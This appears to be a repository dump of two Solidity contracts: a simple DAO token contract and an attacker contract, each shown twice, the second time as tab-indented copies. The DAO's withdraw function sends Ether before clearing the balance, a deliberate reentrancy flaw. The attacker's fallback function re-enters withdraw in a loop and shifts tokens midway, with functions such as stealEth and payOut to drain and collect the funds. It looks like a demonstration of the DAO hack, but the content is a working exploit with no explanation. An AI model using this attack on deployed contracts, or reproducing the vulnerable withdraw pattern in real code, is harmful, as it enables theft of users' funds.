JachinShen/DAO.sol

## attacker.sol
pragma solidity ^0.5.1;
import "./DAO.sol";

contract attacker {
    event DefaultFunc(address caller, uint amount, uint num, uint daoBalance);

    address public daoAddress;
    address public transferAddress;

    uint[] public arr;
    uint public a = 0;

    function () external payable {
        emit DefaultFunc(msg.sender, msg.value,a,simpleDAO(daoAddress).balances(address(this))-1);
        while (a<5) {
            a++;
            arr.push(a);
            if (a==4) {
                simpleDAO(daoAddress).transferTokens(transferAddress, simpleDAO(daoAddress).balances(address(this))-1);
            }
            simpleDAO(daoAddress).withdraw(address(this));
        }

    }

    function fundMe() public payable {

    }

    function stealEth() public {
        simpleDAO(daoAddress).withdraw(address(this));
    }

    function payOut(address payable _payee) public returns (bool) {
        if (_payee.send(address(this).balance)) {
            return true;
        }
    }

    function buyDAOTokens(uint _amount) public payable {
        simpleDAO(daoAddress).buyTokens.value(_amount)();
    }

    function resetA() public {
        a = 0;
    }

    function setDAOAddress(address _dao) public {
        daoAddress = _dao;
    }

    function setTransferAddress(address _transferAddress) public {
        transferAddress = _transferAddress;
    }
}

## DAO.sol
pragma solidity ^0.5.1;
contract simpleDAO {

    event PaymentCalled(address payee, uint amount);
    event TokensBought(address buyer, uint amount);
    event TokensTransfered(address from, address to, uint amount);
    event InsufficientFunds(uint bal, uint amount);

    mapping (address => uint) public balances;


    function buyTokens() public payable {
        balances[msg.sender] += msg.value;
        emit TokensBought(msg.sender, msg.value);
    }

    function transferTokens(address _to, uint _amount) public {
        require(balances[msg.sender] >= _amount);
        balances[_to] += _amount;
        balances[msg.sender] -= _amount;
        emit TokensTransfered(msg.sender, _to, _amount);
    }

    function withdraw(address _recipient) public returns (bool) {
        if (balances[msg.sender] == 0) {
            emit InsufficientFunds(balances[msg.sender], balances[msg.sender]);
        }
        require(balances[msg.sender] > 0);
        emit PaymentCalled(_recipient, balances[msg.sender]);
        bool complete;
        (complete,) = _recipient.call.value(balances[msg.sender])("");
        if (complete) {
            balances[msg.sender] = 0;
            return true;
        }

    }
}
	pragma solidity ^0.5.1;
	import "./DAO.sol";

	contract attacker {
	event DefaultFunc(address caller, uint amount, uint num, uint daoBalance);

	address public daoAddress;
	address public transferAddress;

	uint[] public arr;
	uint public a = 0;

	function () external payable {
	emit DefaultFunc(msg.sender, msg.value,a,simpleDAO(daoAddress).balances(address(this))-1);
	while (a<5) {
	a++;
	arr.push(a);
	if (a==4) {
	simpleDAO(daoAddress).transferTokens(transferAddress, simpleDAO(daoAddress).balances(address(this))-1);
	}
	simpleDAO(daoAddress).withdraw(address(this));
	}

	}

	function fundMe() public payable {

	}

	function stealEth() public {
	simpleDAO(daoAddress).withdraw(address(this));
	}

	function payOut(address payable _payee) public returns (bool) {
	if (_payee.send(address(this).balance)) {
	return true;
	}
	}

	function buyDAOTokens(uint _amount) public payable {
	simpleDAO(daoAddress).buyTokens.value(_amount)();
	}

	function resetA() public {
	a = 0;
	}

	function setDAOAddress(address _dao) public {
	daoAddress = _dao;
	}

	function setTransferAddress(address _transferAddress) public {
	transferAddress = _transferAddress;
	}
	}
	pragma solidity ^0.5.1;
	contract simpleDAO {

	event PaymentCalled(address payee, uint amount);
	event TokensBought(address buyer, uint amount);
	event TokensTransfered(address from, address to, uint amount);
	event InsufficientFunds(uint bal, uint amount);

	mapping (address => uint) public balances;


	function buyTokens() public payable {
	balances[msg.sender] += msg.value;
	emit TokensBought(msg.sender, msg.value);
	}

	function transferTokens(address _to, uint _amount) public {
	require(balances[msg.sender] >= _amount);
	balances[_to] += _amount;
	balances[msg.sender] -= _amount;
	emit TokensTransfered(msg.sender, _to, _amount);
	}

	function withdraw(address _recipient) public returns (bool) {
	if (balances[msg.sender] == 0) {
	emit InsufficientFunds(balances[msg.sender], balances[msg.sender]);
	}
	require(balances[msg.sender] > 0);
	emit PaymentCalled(_recipient, balances[msg.sender]);
	bool complete;
	(complete,) = _recipient.call.value(balances[msg.sender])("");
	if (complete) {
	balances[msg.sender] = 0;
	return true;
	}

	}
	}